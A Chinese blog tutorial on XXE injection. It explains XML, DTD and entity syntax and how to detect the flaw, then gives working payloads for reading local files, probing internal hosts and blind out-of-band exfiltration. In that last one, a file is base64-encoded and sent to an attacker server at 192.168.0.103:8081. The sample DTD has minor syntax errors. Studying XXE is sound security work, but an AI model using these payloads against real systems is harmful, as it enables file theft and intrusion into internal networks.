xxe/xml注入 part1_xxe与xml注入-CSDN博客

本文链接：https://blog.csdn.net/m0_49271388/article/details/124895589

漏洞原理

XML 被设计为传输和存储数据，XML 文档结构包括 XML 声明、DTD 文档类型定义（可选）、文档元素，其焦点是数据的内容，其把数据从 HTML 分离，是独立于软件和硬件的信息传输工具。XXE 漏洞全称XML External Entity Injection，即 xml 外部实体注入漏洞，XXE 漏洞发生在应用程序解析 XML 输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害

XML和HTML差异

XML 被设计为传输和存储数据，其焦点是数据的内容。
HTML 被设计用来显示数据，其焦点是数据的外观。
HTML 旨在显示信息，而 XML 旨在传输信息

XML

<!--XML 声明-->
<?xml version="1.0"?>
<!--文档类型定义-->
<!DOCTYPE note [ <!--定义此文档是 note 类型的文档-->
<!ELEMENT note (to,from,heading,body)> <!--定义 note 元素有四个元素-->
<!ELEMENT to (#PCDATA)> <!--定义 to 元素为”#PCDATA”类型-->
<!ELEMENT from (#PCDATA)> <!--定义 from 元素为”#PCDATA”类型-->
<!ELEMENT head (#PCDATA)> <!--定义 head 元素为”#PCDATA”类型-->
<!ELEMENT body (#PCDATA)> <!--定义 body 元素为”#PCDATA”类型-->
]]]>
<!--文档元素-->
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>

DTD

文档类型定义（DTD）可定义合法的 XML 文档构建模块
它使用一系列合法的元素来定义文档的结构
DTD 可被成行地声明于 XML 文档中，也可作为一个外部引用
（1）内部的 DOCTYPE 声明
<!DOCTYPE 根元素 [元素声明]>
（2）外部文档声明
<!DOCTYPE 根元素 SYSTEM ”文件名”>

DTD 实体

（1）内部实体声明
<!ENTITY 实体名称 ”实体的值”>
（2）外部实体声明
<!ENTITY 实体名称 SYSTEM ”URI”>
（3）参数实体声明
<!ENTITY %实体名称 ”实体的值”>
<!ENTITY %实体名称 SYSTEM ”URI”>

漏洞检测

扫描工具

appscan

人工

数据格式类型判断

<user>test</user><pass>Mikasa</pass>

Content-Type值判断

text/xml
application/xml

更改Content-Type值看返回

更改为text/xml或application/xml中一种，再把攻击语句写在提交数据中来测试是否存在xml漏洞

漏洞利用

有回显

读取文件

<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///d://test.txt"><!--test.txt为目标文件-->
]>
<x>&xxe;</x>

pikachu本地靶场测试：
在E:\ST\PHPSTUDY\WWW\pikachu\test.txt目录下创建test.txt文件
请添加图片描述在这里插入图片描述
输入<?xml version = "1.0"?> <!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "file:///E://ST//PHPSTUDY//WWW//pikachu//test.txt"> ]> <x>&xxe;</x>

提交后得到目标文件内容
在这里插入图片描述

内网探针或攻击内网应用（触发漏洞地址）

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY rabbit SYSTEM "http://192.168.0.103:8081/index.txt" >
]>
<x>&rabbit;</x>

引入外部实体 dtd

<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://127.0.0.1:8081/evil2.dtd">
%file;
]>
<x>&send;</x>

evil2.dtd:

<!ENTITY send SYSTEM "file:///d:/test.txt">

注：若函数设置外部实体禁止引用则改攻击会失效

无回显

读取文件

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=test.txt">
<!ENTITY % dtd SYSTEM "http://192.168.0.103:8081/test.dtd">
%dtd;
%send;
]>

test.dtd：

<!ENTITY % payload
"<!ENTITY &#x25; send SYSTEM 'http://192.168.0.103:8081/?data=%file;'>"
>
%payload;

注：通过让攻击对象访问服务器来实现将数据传递到服务器访问日志中

后续内容待更新…
笔记链接 https://www.yuque.com/docs/share/bc4c7e4d-8f25-4a39-94ee-062d82eeee65?# 《XML/XEE漏洞》
链接有效期至 2022-05-24 11:18:09